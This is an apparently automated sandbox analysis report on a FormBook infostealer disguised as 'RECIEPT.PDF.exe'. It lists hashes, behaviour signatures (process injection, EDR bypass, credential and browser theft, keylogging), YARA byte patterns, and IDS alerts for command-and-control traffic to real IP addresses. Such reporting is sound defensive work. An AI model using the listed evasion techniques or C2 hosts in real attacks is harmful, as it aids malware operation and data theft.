Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RECIEPT.PDF.exe

Overview

General Information

Sample name:RECIEPT.PDF.exe
Analysis ID:1515414
MD5:7463e695421bdd0e02e74c7ef9d6610e
SHA1:f27dc8f2b10865ce26c78476fe2a1d9f74301dc9
SHA256:44d7ddc5c8352f4bcce5d1acefe958aa67b49ade05f24ded7212e0b848640973
Tags:exePDFuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RECIEPT.PDF.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\RECIEPT.PDF.exe" MD5: 7463E695421BDD0E02E74C7EF9D6610E)
    • svchost.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\RECIEPT.PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • dgGgsACWgP.exe (PID: 2576 cmdline: "C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Robocopy.exe (PID: 6504 cmdline: "C:\Windows\SysWOW64\Robocopy.exe" MD5: 0A1AA3D138103ED9FB645F6B02E41A2F)
          • dgGgsACWgP.exe (PID: 4544 cmdline: "C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3548 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c180:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1425f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.4786140972.0000000005440000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x48cb:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c180:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1425f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      Click to see the 11 entries
      SourceRuleDescriptionAuthorStrings
      2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2e803:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x168e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f603:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RECIEPT.PDF.exe", CommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\RECIEPT.PDF.exe, NewProcessName: C:\Users\user\Desktop\RECIEPT.PDF.exe, OriginalFileName: C:\Users\user\Desktop\RECIEPT.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", ProcessId: 6864, ProcessName: RECIEPT.PDF.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\Robocopy.exe, NewProcessName: C:\Windows\SysWOW64\Robocopy.exe, OriginalFileName: C:\Windows\SysWOW64\Robocopy.exe, ParentCommandLine: "C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe" , ParentImage: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe, ParentProcessId: 2576, ParentProcessName: dgGgsACWgP.exe, ProcessCommandLine: "C:\Windows\SysWOW64\Robocopy.exe", ProcessId: 6504, ProcessName: Robocopy.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RECIEPT.PDF.exe", CommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", ParentImage: C:\Users\user\Desktop\RECIEPT.PDF.exe, ParentProcessId: 6864, ParentProcessName: RECIEPT.PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", ProcessId: 6968, ProcessName: svchost.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RECIEPT.PDF.exe", CommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", ParentImage: C:\Users\user\Desktop\RECIEPT.PDF.exe, ParentProcessId: 6864, ParentProcessName: RECIEPT.PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RECIEPT.PDF.exe", ProcessId: 6968, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-22T17:36:01.382042+020028554651A Network Trojan was detected192.168.2.1249717199.59.243.22780TCP
          2024-09-22T17:36:24.650384+020028554651A Network Trojan was detected192.168.2.124972284.32.84.3280TCP
          2024-09-22T17:36:38.487296+020028554651A Network Trojan was detected192.168.2.12497263.33.130.19080TCP
          2024-09-22T17:36:52.091838+020028554651A Network Trojan was detected192.168.2.1249730194.85.61.7680TCP
          2024-09-22T17:37:06.833599+020028554651A Network Trojan was detected192.168.2.1249734162.0.238.24680TCP
          2024-09-22T17:37:20.989836+020028554651A Network Trojan was detected192.168.2.124973838.47.233.6580TCP
          2024-09-22T17:37:34.402433+020028554651A Network Trojan was detected192.168.2.1249742217.70.184.5080TCP
          2024-09-22T17:37:47.855807+020028554651A Network Trojan was detected192.168.2.124974652.223.13.4180TCP
          2024-09-22T17:38:01.311469+020028554651A Network Trojan was detected192.168.2.12497503.33.130.19080TCP
          2024-09-22T17:38:14.705558+020028554651A Network Trojan was detected192.168.2.1249754134.119.247.13680TCP
          2024-09-22T17:38:37.021983+020028554651A Network Trojan was detected192.168.2.1249758208.91.197.2780TCP
          2024-09-22T17:38:50.995647+020028554651A Network Trojan was detected192.168.2.1249762156.226.22.23380TCP
          2024-09-22T17:39:04.941344+020028554651A Network Trojan was detected192.168.2.1249766206.119.82.17280TCP
          2024-09-22T17:39:20.724641+020028554651A Network Trojan was detected192.168.2.1249770194.58.112.17480TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-22T17:36:16.968225+020028554641A Network Trojan was detected192.168.2.124971984.32.84.3280TCP
          2024-09-22T17:36:19.511860+020028554641A Network Trojan was detected192.168.2.124972084.32.84.3280TCP
          2024-09-22T17:36:22.070411+020028554641A Network Trojan was detected192.168.2.124972184.32.84.3280TCP
          2024-09-22T17:36:30.197329+020028554641A Network Trojan was detected192.168.2.12497233.33.130.19080TCP
          2024-09-22T17:36:32.697494+020028554641A Network Trojan was detected192.168.2.12497243.33.130.19080TCP
          2024-09-22T17:36:35.264913+020028554641A Network Trojan was detected192.168.2.12497253.33.130.19080TCP
          2024-09-22T17:36:44.478633+020028554641A Network Trojan was detected192.168.2.1249727194.85.61.7680TCP
          2024-09-22T17:36:47.045148+020028554641A Network Trojan was detected192.168.2.1249728194.85.61.7680TCP
          2024-09-22T17:36:49.547523+020028554641A Network Trojan was detected192.168.2.1249729194.85.61.7680TCP
          2024-09-22T17:36:58.825066+020028554641A Network Trojan was detected192.168.2.1249731162.0.238.24680TCP
          2024-09-22T17:37:01.747490+020028554641A Network Trojan was detected192.168.2.1249732162.0.238.24680TCP
          2024-09-22T17:37:04.172323+020028554641A Network Trojan was detected192.168.2.1249733162.0.238.24680TCP
          2024-09-22T17:37:13.067528+020028554641A Network Trojan was detected192.168.2.124973538.47.233.6580TCP
          2024-09-22T17:37:15.650971+020028554641A Network Trojan was detected192.168.2.124973638.47.233.6580TCP
          2024-09-22T17:37:18.184295+020028554641A Network Trojan was detected192.168.2.124973738.47.233.6580TCP
          2024-09-22T17:37:26.685467+020028554641A Network Trojan was detected192.168.2.1249739217.70.184.5080TCP
          2024-09-22T17:37:29.381168+020028554641A Network Trojan was detected192.168.2.1249740217.70.184.5080TCP
          2024-09-22T17:37:31.889938+020028554641A Network Trojan was detected192.168.2.1249741217.70.184.5080TCP
          2024-09-22T17:37:40.150166+020028554641A Network Trojan was detected192.168.2.124974352.223.13.4180TCP
          2024-09-22T17:37:42.776764+020028554641A Network Trojan was detected192.168.2.124974452.223.13.4180TCP
          2024-09-22T17:37:45.264860+020028554641A Network Trojan was detected192.168.2.124974552.223.13.4180TCP
          2024-09-22T17:37:53.614412+020028554641A Network Trojan was detected192.168.2.12497473.33.130.19080TCP
          2024-09-22T17:37:56.204351+020028554641A Network Trojan was detected192.168.2.12497483.33.130.19080TCP
          2024-09-22T17:37:58.851877+020028554641A Network Trojan was detected192.168.2.12497493.33.130.19080TCP
          2024-09-22T17:38:06.979934+020028554641A Network Trojan was detected192.168.2.1249751134.119.247.13680TCP
          2024-09-22T17:38:09.553352+020028554641A Network Trojan was detected192.168.2.1249752134.119.247.13680TCP
          2024-09-22T17:38:12.094671+020028554641A Network Trojan was detected192.168.2.1249753134.119.247.13680TCP
          2024-09-22T17:38:28.468371+020028554641A Network Trojan was detected192.168.2.1249755208.91.197.2780TCP
          2024-09-22T17:38:31.090903+020028554641A Network Trojan was detected192.168.2.1249756208.91.197.2780TCP
          2024-09-22T17:38:33.624573+020028554641A Network Trojan was detected192.168.2.1249757208.91.197.2780TCP
          2024-09-22T17:38:43.199998+020028554641A Network Trojan was detected192.168.2.1249759156.226.22.23380TCP
          2024-09-22T17:38:45.752878+020028554641A Network Trojan was detected192.168.2.1249760156.226.22.23380TCP
          2024-09-22T17:38:48.779505+020028554641A Network Trojan was detected192.168.2.1249761156.226.22.23380TCP
          2024-09-22T17:38:57.155807+020028554641A Network Trojan was detected192.168.2.1249763206.119.82.17280TCP
          2024-09-22T17:38:59.711683+020028554641A Network Trojan was detected192.168.2.1249764206.119.82.17280TCP
          2024-09-22T17:39:02.576895+020028554641A Network Trojan was detected192.168.2.1249765206.119.82.17280TCP
          2024-09-22T17:39:11.129337+020028554641A Network Trojan was detected192.168.2.1249767194.58.112.17480TCP
          2024-09-22T17:39:13.648944+020028554641A Network Trojan was detected192.168.2.1249768194.58.112.17480TCP
          2024-09-22T17:39:16.625364+020028554641A Network Trojan was detected192.168.2.1249769194.58.112.17480TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: RECIEPT.PDF.exeAvira: detected
          Source: RECIEPT.PDF.exeReversingLabs: Detection: 42%
          Source: RECIEPT.PDF.exeVirustotal: Detection: 46%Perma Link
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: RECIEPT.PDF.exeJoe Sandbox ML: detected
          Source: RECIEPT.PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: robocopy.pdb source: svchost.exe, 00000002.00000003.2636677658.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2636677658.000000000343B000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4782565140.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dgGgsACWgP.exe, 00000005.00000002.4780001115.000000000033E000.00000002.00000001.01000000.00000005.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747138146.000000000033E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: RECIEPT.PDF.exe, 00000000.00000003.2399256414.0000000004770000.00000004.00001000.00020000.00000000.sdmp, RECIEPT.PDF.exe, 00000000.00000003.2396868479.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2570263548.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572074015.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2680538261.0000000004274000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.000000000476E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2682309035.0000000004423000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RECIEPT.PDF.exe, 00000000.00000003.2399256414.0000000004770000.00000004.00001000.00020000.00000000.sdmp, RECIEPT.PDF.exe, 00000000.00000003.2396868479.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2570263548.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572074015.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000006.00000003.2680538261.0000000004274000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.000000000476E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2682309035.0000000004423000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: robocopy.pdbGCTL source: svchost.exe, 00000002.00000003.2636677658.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2636677658.000000000343B000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4782565140.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: Robocopy.exe, 00000006.00000002.4791340165.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4781250480.0000000000735000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747764571.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2970976334.000000002CB2C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: Robocopy.exe, 00000006.00000002.4791340165.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4781250480.0000000000735000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747764571.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2970976334.000000002CB2C000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004EC650 FindFirstFileW,FindNextFileW,FindClose,6_2_004EC650
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then xor eax, eax6_2_004D9CC0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then pop edi6_2_004F2779
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then mov ebx, 00000004h6_2_043104E8

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49720 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49729 -> 194.85.61.76:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49722 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49723 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49717 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49724 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49721 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49726 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49732 -> 162.0.238.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49731 -> 162.0.238.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49733 -> 162.0.238.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49727 -> 194.85.61.76:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49734 -> 162.0.238.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49725 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49737 -> 38.47.233.65:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49735 -> 38.47.233.65:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49742 -> 217.70.184.50:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49736 -> 38.47.233.65:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49746 -> 52.223.13.41:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49740 -> 217.70.184.50:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49728 -> 194.85.61.76:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49730 -> 194.85.61.76:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49750 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49743 -> 52.223.13.41:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49741 -> 217.70.184.50:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49719 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49739 -> 217.70.184.50:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49738 -> 38.47.233.65:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49759 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49757 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49748 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49761 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49756 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49747 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49766 -> 206.119.82.172:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49754 -> 134.119.247.136:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49752 -> 134.119.247.136:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49755 -> 208.91.197.27:80
